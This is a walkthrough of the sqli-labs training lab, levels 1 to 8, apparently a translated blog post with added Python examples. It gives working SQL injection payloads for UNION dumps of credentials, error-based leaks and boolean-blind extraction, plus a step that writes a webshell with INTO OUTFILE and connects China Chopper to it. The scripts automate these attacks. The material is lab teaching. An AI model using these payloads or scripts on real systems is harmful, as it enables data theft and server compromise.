
sqli-labs level-by-level walkthrough (less 1-8)

2022-08-16 09:32 Author: 笨蛋灬你变了

less-1

GET - error based - single quotes - string

1. Identify the injection point

http://sqlilab.pl.com:8080/Less-1/


http://sqlilab.pl.com:8080/Less-1/?id=1


http://sqlilab.pl.com:8080/Less-1/?id=1' (SQL error shown: a possible injection point)


http://sqlilab.pl.com:8080/Less-1/?id=1' and '1'='1 (page renders normally)

http://sqlilab.pl.com:8080/Less-1/?id=1' and '1'='2 (no data shown) (the injection point is string type: the parameter is wrapped in single quotes)

2. Determine the number of columns

http://sqlilab.pl.com:8080/Less-1/?id=1' order by 4 --+ (error: there is no 4th column; `--+` decodes to `-- `, the trailing space MySQL requires after `--` for a comment)

http://sqlilab.pl.com:8080/Less-1/?id=1' order by 3 --+ (renders normally) (3 columns)

http://sqlilab.pl.com:8080/Less-1/?id=-1' union select 1,2,3 --+ (id=-1 matches no row, so the row the page displays is the one the UNION appends; this shows which of the placeholders 2 and 3 are echoed)


3. Dump database names (current and all)

http://sqlilab.pl.com:8080/Less-1/?id=' union select 1,database(),3 --+ (an empty id matches no row, just like -1; the current database name appears in the echoed column 2)


http://sqlilab.pl.com:8080/Less-1/?id=' union select 1,group_concat(schema_name),3 from information_schema.schemata --+


4. Dump tables

http://sqlilab.pl.com:8080/Less-1/?id=' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+


5. Dump columns

http://sqlilab.pl.com:8080/Less-1/?id=' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users' --+


6. Dump data

http://sqlilab.pl.com:8080/Less-1/?id=' union select 1,group_concat(username),group_concat(password) from security.users --+ (security is the database name found in step 3, users the table from step 4)


less-2

GET - error based - integer based

http://sqlilab.pl.com:8080/Less-2/?id=1' (error shown, possible injection point)

http://sqlilab.pl.com:8080/Less-2/?id=1 and 1=1 (renders normally)

http://sqlilab.pl.com:8080/Less-2/?id=1 and 1=2 (no data shown) (integer injection: there is no quote to close, so no comment is needed)

http://sqlilab.pl.com:8080/Less-2/?id=1 order by 3 (renders normally) (3 columns)

http://sqlilab.pl.com:8080/Less-2/?id=-1 union select 1,2,3

http://sqlilab.pl.com:8080/Less-2/?id=-1 union select 1,database(),3

http://sqlilab.pl.com:8080/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata

less-3

GET - error based - single quotes with twist (parentheses) - string

http://sqlilab.pl.com:8080/Less-3/?id=1')--+ (renders normally: the query wraps the parameter as ('id'), so the payload must close both the quote and the parenthesis)

http://sqlilab.pl.com:8080/Less-3/?id=1') order by 3--+

http://sqlilab.pl.com:8080/Less-3/?id=-1') union select 1,2,3 --+

less-4

GET - error based - double quotes - string

http://sqlilab.pl.com:8080/Less-4/?id=1" (error shown, injection point exists)

http://sqlilab.pl.com:8080/Less-4/?id=1") --+ (renders normally: the query wraps the parameter as ("id"))

http://sqlilab.pl.com:8080/Less-4/?id=-1") union select 1,2,3--+
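The Less-1 to Less-4 chain (close the wrapper, count the columns with ORDER BY, dump with UNION) differs only in how each level embeds the id parameter. The following is an added example, not code from the sqli-labs project or from this post: it reproduces the vulnerable string-concatenated query against a constructed in-memory SQLite table standing in for security.users (SQLite is used so it runs offline; MySQL differs only in the error text), runs the column-count and UNION steps for the single-quote, integer and ('id') wrappers, and shows the parameterised query that the same payload cannot break. The table contents and the CONTEXTS/breakout strings are assumptions; Less-4's ("id") wrapper is left out because SQLite reads double-quoted text as an identifier.

```python
import sqlite3

# Constructed stand-in for sqli-labs' security.users table (offline, SQLite in memory).
db = sqlite3.connect(":memory:")
db.executescript("""
CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES (1,'Dumb','Dumb'),(2,'Angelina','I-kill-you'),(3,'Dummy','p@ssword');
""")

# How each lesson embeds the id parameter (wrapper) and what the payload must emit
# to close that wrapper before its own SQL (breakout). Assumed from the probing
# steps above; Less-4's ("id") wrapper is omitted (SQLite treats "..." as an identifier).
CONTEXTS = {
    "Less-1": ("'{}'",   "'"),    # WHERE id='1'    -> payload starts with  1'
    "Less-2": ("{}",     ""),     # WHERE id=1      -> payload starts with  1
    "Less-3": ("('{}')", "')"),   # WHERE id=('1')  -> payload starts with  1')
}

def vulnerable_lookup(context, raw_id):
    """The lab's bug: the parameter is pasted into the SQL string unchanged."""
    wrapper, _ = CONTEXTS[context]
    sql = "SELECT id,username,password FROM users WHERE id=" + wrapper.format(raw_id) + " LIMIT 1"
    return db.execute(sql).fetchall()

def find_column_count(context, max_cols=10):
    """The 'order by 3 / order by 4' step: ORDER BY n is rejected once n exceeds the
    number of selected columns, so the last n that works is the column count."""
    _, breakout = CONTEXTS[context]
    for n in range(1, max_cols + 1):
        try:
            vulnerable_lookup(context, f"1{breakout} order by {n} -- ")
        except sqlite3.OperationalError:      # MySQL says: Unknown column '4' in 'order clause'
            return n - 1
    raise RuntimeError(f"more than {max_cols} columns")

def union_dump(context):
    """The 'id=-1 union select ...' step: -1 matches no row, so the only row the page
    renders is the one the UNION appends; group_concat squeezes a whole column into it."""
    _, breakout = CONTEXTS[context]
    ncols = find_column_count(context)
    cols = [str(i) for i in range(1, ncols - 1)] + ["group_concat(username)", "group_concat(password)"]
    payload = f"-1{breakout} union select {','.join(cols)} from users -- "
    row = vulnerable_lookup(context, payload)[0]
    return row[-2], row[-1]

def safe_lookup(raw_id):
    """Parameterised query: the same payload is bound as data and simply matches nothing."""
    return db.execute("SELECT id,username,password FROM users WHERE id=? LIMIT 1", (raw_id,)).fetchall()

if __name__ == "__main__":
    for ctx in CONTEXTS:
        print(ctx, find_column_count(ctx), union_dump(ctx))
    print(safe_lookup("-1' union select 1,group_concat(username),group_concat(password) from users -- "))
```

The comment `-- ` (with the trailing space) plays the role of `--+` in the URLs above; on the real lab the payload also has to be percent-encoded before it goes into the query string.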

less-5

GET - double injection - single quotes - string (double query: the error is triggered with count(), group by, floor() and rand())

select count(*) from tbl_name group by floor(rand(0)*2) (tbl_name needs at least three rows; the query then fails with a duplicate-key error, and whatever is concatenated into the group key is echoed back inside that error message)

http://sqlilab.pl.com:8080/Less-5/?id=1


http://sqlilab.pl.com:8080/Less-5/?id=1' (error shown)

http://sqlilab.pl.com:8080/Less-5/?id=1' --+ (renders normally)

http://sqlilab.pl.com:8080/Less-5/?id=1' union select 1,count(*),concat((select database()),':',floor(rand(0)*2)) as a from information_schema.tables group by a --+ (the error reads Duplicate entry '<database name>:1' ..., leaking the current database name)


http://sqlilab.pl.com:8080/Less-5/?id=1' union select 1,count(*),concat((select group_concat(table_name) from information_schema.tables where table_schema=database()),':',floor(rand(0) *2)) as a from information_schema.tables group by a --+


less-6

GET - double injection - double quotes - string

http://sqlilab.pl.com:8080/Less-6/?id=1

http://sqlilab.pl.com:8080/Less-6/?id=1' (renders normally: a single quote does not break this query)

http://sqlilab.pl.com:8080/Less-6/?id=1" (error shown)

http://sqlilab.pl.com:8080/Less-6/?id=1" and 1=1--+ (renders normally)

http://sqlilab.pl.com:8080/Less-6/?id=1" and 1=2--+ (no data shown)

http://sqlilab.pl.com:8080/Less-6/?id=1"order by 4--+ (error shown: 3 columns)

http://sqlilab.pl.com:8080/Less-6/?id=1"union select 1,count(*),concat((select database()),':',floor(rand(0)*2)) as a from information_schema.tables group by a--+


http://sqlilab.pl.com:8080/Less-6/?id=1"union select 1,count(*),concat((select username from security.users limit 0,1),':',floor(rand(0)*2)) as a from information_schema.tables group by a--+ (one username per request; move the limit offset to get the next one)
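Why the Less-5 and Less-6 payloads need rand(0), floor() and a table of three or more rows is easier to see in a model than in MySQL's error text. The following is an added example, not code from the post or from sqli-labs: a small Python model of how MySQL's GROUP BY evaluates a non-deterministic key twice (once to look it up in its temporary table, once more when inserting), which is the behaviour behind the duplicate-key error. The key sequence is the fixed output of floor(rand(0)*2) for seed 0 (0, 1, 1, 0, 1, 1, ...); the error-message format is the one MySQL prints, and the `security` secret is taken from the lab. Nothing here talks to a database.

```python
import re

# floor(rand(0)*2) is deterministic: seed 0 always produces this key sequence
# (well-known seed-0 values; only the first six are needed for the collision).
RAND0_FLOOR2 = [0, 1, 1, 0, 1, 1]

class DuplicateEntry(Exception):
    """Stands in for MySQL error 1062 raised from the GROUP BY temporary table."""

def simulate_group_by(row_count, key_stream=RAND0_FLOOR2):
    """Model of MySQL's GROUP BY on a non-deterministic key: the key expression is
    evaluated once to look it up in the temporary table and, when it is absent,
    evaluated AGAIN to insert. The second value can already be present -> duplicate key."""
    keys = iter(key_stream)
    temp_table = {}                           # group key -> count(*)
    for _ in range(row_count):
        key = next(keys)                      # evaluation 1: lookup
        if key in temp_table:
            temp_table[key] += 1
            continue
        key = next(keys)                      # evaluation 2: insert (re-evaluated!)
        if key in temp_table:
            raise DuplicateEntry(f"Duplicate entry '{key}' for key 'group_key'")
        temp_table[key] = 1
    return temp_table

def double_query_leak(secret, row_count=3):
    """What the Less-5/6 payload does: concat(<secret>,':',floor(rand(0)*2)) is the
    group key, so <secret> comes back inside the duplicate-key error text.
    Returns the leaked value, or None when the table is too small for a collision."""
    keys = [f"{secret}:{k}" for k in RAND0_FLOOR2]
    try:
        simulate_group_by(row_count, keys)
    except DuplicateEntry as err:
        return re.search(r"Duplicate entry '(.*):1' for key", str(err)).group(1)
    return None

if __name__ == "__main__":
    print(simulate_group_by(2))                       # two rows: {1: 2}, no error
    print(double_query_leak("security"))              # three rows: 'security' leaks
    print(double_query_leak("security", row_count=2)) # None: no collision yet
```

Row 1 looks up key 0, misses, re-evaluates to 1 and inserts 1; row 2 looks up 1 and hits; row 3 looks up 0, misses, re-evaluates to 1 and collides. That is why two rows are not enough and why information_schema.tables (always large) is the usual FROM clause. MySQL truncates the value quoted in the error message, so long results are read out piecewise with substring()/limit as in the username payload above.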


less-7

GET - dump into outfile - string (write query output to a file)

http://127.0.0.1:8080/Less-7/?id=1

http://127.0.0.1:8080/Less-7/?id=1' (error shown)

http://127.0.0.1:8080/Less-7/?id=1')) and 1=1--+ (renders normally) (the query wraps the parameter as (('id')))

http://127.0.0.1:8080/Less-1/?id=-1'union select 1,2,@@datadir--+ (Less-7 echoes nothing, so the path is read through Less-1 on the same server; @@datadir returns MySQL's data directory, from which the phpstudy install path and the web root are inferred)

http://127.0.0.1:8080/Less-7/?id=1')) and (select count(*) from mysql.user)>0 --+ (renders normally: the DB user can read mysql.user, i.e. it runs with high privileges; writing a file additionally requires the FILE privilege and secure_file_priv must be empty rather than NULL or another directory)

http://127.0.0.1:8080/Less-7/?id=1')) union select 1,2,3 into outfile "absolute path of less-7text.txt"--+ (the page still shows an error, but the file has been written)

http://sqlilab.pl.com:8080/Less-7/?id=1')) union select 1,2,'<one-line webshell>' into outfile "C:\users\73125\software\phpstudy_pro\www\sqlilab.pl.com\Less-7\test.php" -- + (visit the file after writing it; inside a MySQL string literal a backslash is an escape character, so the path must use doubled backslashes or forward slashes)

http://sqlilab.pl.com:8080/less-7/test.php (paste this URL into 中国菜刀 (China Chopper) to add the shell)

less-8

GET - blind - boolean based - single quotes

http://sqlilab.pl.com:8080/Less-8/?id=1 (renders normally)

http://sqlilab.pl.com:8080/Less-8/?id=1' (no data shown: no SQL error is echoed, so this level is blind)

http://sqlilab.pl.com:8080/Less-8/?id=1' --+ (renders normally)

http://sqlilab.pl.com:8080/Less-8/?id=1'and 1=1--+ (renders normally)

http://sqlilab.pl.com:8080/Less-8/?id=1'and 1=2--+ (no data shown) (true and false conditions give distinguishable pages, so a boolean oracle exists)

http://sqlilab.pl.com:8080/Less-8/?id=1'and length(database())=8--+ (renders normally: the database name is 8 characters long)

http://sqlilab.pl.com:8080/Less-8/?id=1'and substring(database(),1,1)='s'--+ (renders normally: the first character of the database name is s)

Write a Python script to brute-force the database name: one request per guess, then check whether the response is the "normal" page.

import urllib.request

final_url = "http://sqlilab.pl.com:8080/Less-8/?id=1%27and%20length(database())=8--+"  # one guess, percent-encoded
res = urllib.request.urlopen(final_url)
echo = res.read().decode("utf-8")
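A complete version of that script, added here as an example rather than taken from the post: the length and each character are found by binary search over the oracle (about seven requests per character instead of one per candidate), the extractor is written against any true/false oracle, and two oracles are provided. `local_oracle` runs the same concatenated query against a constructed in-memory SQLite table so the example works offline; `http_oracle` is the page's urllib approach against the real Less-8, with the `You are in` marker text being an assumption to adjust to whatever your lab prints on a true condition. On MySQL the character function is ascii(); SQLite spells it unicode(); substr() exists on both.

```python
import sqlite3
import urllib.parse
import urllib.request

# Offline oracle: constructed SQLite stand-in for Less-8 (row found -> "true" page, else empty page).
db = sqlite3.connect(":memory:")
db.executescript("""
CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES (1,'Dumb','Dumb'),(2,'Angelina','I-kill-you');
""")

def local_oracle(condition):
    """Same bug as the lab: the payload closes the quote, ANDs our condition, comments the rest."""
    raw_id = f"1' and ({condition}) -- "
    sql = "SELECT id FROM users WHERE id='" + raw_id + "' LIMIT 1"
    return bool(db.execute(sql).fetchall())

def http_oracle(base_url, condition, marker="You are in"):
    """The real thing against the lab (network): True when the page contains `marker`.
    The marker string is an assumption; use whatever your Less-8 prints for a true query."""
    raw_id = f"1' and ({condition}) -- "
    with urllib.request.urlopen(base_url + "?id=" + urllib.parse.quote(raw_id, safe="")) as res:
        return marker in res.read().decode("utf-8", "replace")

def bisect_value(oracle, expr, lo, hi):
    """Integer value of `expr` in [lo, hi] with ~log2(hi-lo) true/false questions
    (the page's '=8' and ='s' guesses, without trying every candidate)."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"{expr} <= {mid}"):
            hi = mid
        else:
            lo = mid + 1
    return lo

def extract(oracle, expr, ascii_fn="ascii", max_len=64):
    """Boolean-blind dump of a string expression, e.g. extract(oracle, 'database()') on MySQL.
    ascii_fn is ascii() on MySQL and unicode() on SQLite; substr() works on both."""
    length = bisect_value(oracle, f"length({expr})", 0, max_len)
    return "".join(
        chr(bisect_value(oracle, f"{ascii_fn}(substr({expr},{i},1))", 0, 127))
        for i in range(1, length + 1)
    )

if __name__ == "__main__":
    print(extract(local_oracle, "(select username from users where id=1)", ascii_fn="unicode"))
    # Against the lab itself (network, not run here):
    # oracle = lambda cond: http_oracle("http://sqlilab.pl.com:8080/Less-8/", cond)
    # print(extract(oracle, "database()"))
```

`urllib.parse.quote` turns the quote and spaces into `%27` and `%20`, so `-- ` survives as a valid MySQL comment; the binary search assumes the target is ASCII, which holds for database, table and column names in the lab.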

